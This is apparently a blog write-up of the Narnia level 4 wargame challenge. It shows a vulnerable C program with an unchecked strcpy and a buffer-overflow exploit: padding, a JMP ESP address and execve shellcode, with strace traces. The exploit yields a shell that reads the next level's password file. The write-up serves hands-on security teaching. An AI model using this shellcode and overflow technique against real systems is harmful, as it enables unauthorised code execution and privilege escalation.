1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | #include <string.h> #include <stdlib.h> #include <stdio.h> #include <ctype.h> extern char **environ; int main(int argc,char **argv){ int i; char buffer[256]; for(i = 0; environ[i] != NULL; i++) memset(environ[i], '\0', strlen(environ[i])); if(argc>1) strcpy(buffer,argv[1]); return 0; } |
It seems a basic stack overflow like level2 with a longer buffer, but before the vulnerable strcpy(), the executable cleans the environment variable.
Let's try to use the JMP ESP tecnique using the same address used in level2:
narnia4@narnia:~$ strace /narnia/narnia4 $(python -c 'print "A"*264 + "\x97\x4f\xfc\xf7" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"') execve("/narnia/narnia4", ["/narnia/narnia4", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...], [/* 17 vars */]) = 0 strace: [ Process PID=8400 runs in 32 bit mode. ] brk(NULL) = 0x804a000 ... execve("/bin//sh", ["/bin//sh"], [/* 6 vars */]) = -1 EFAULT (Bad address) --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xfffffff2} --- +++ killed by SIGSEGV +++ Segmentation fault
So why don't we use the same shellcode that worked for level1?
It was a longer shellcode that cleaned up the arguments of execve (apart the first parameter that is the string represeting what we want to execute: "/bin//sh"):
narnia4@narnia:~$ strace /narnia/narnia4 $(python -c 'print "A"*264 + "\x97\x4f\xfc\xf7" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"') narnia4@narnia:~$ strace /narnia/narnia4 $(python -c 'print "A"*264 + "\x97\x4f\xfc\xf7" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"') execve("/narnia/narnia4", ["/narnia/narnia4", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...], [/* 17 vars */]) = 0 strace: [ Process PID=8441 runs in 32 bit mode. ] brk(NULL) = 0x804a000 fcntl64(0, F_GETFD) = 0 fcntl64(1, F_GETFD) = 0 fcntl64(2, F_GETFD) = 0 .... write(2, "$ ", 2$ ) = 2 read(0,
So it's working, the shell is executed and presents the prompt in the write(2, "$",) and waits for input in the read(0,
Now, without strace, we get a shell:
narnia4@narnia:~$ /narnia/narnia4 $(python -c 'print "A"*264 + "\x97\x4f\xfc\xf7" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"') $ id uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14004(narnia4) $ cat /etc/narnia_pass/narnia5 f*******y
$
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.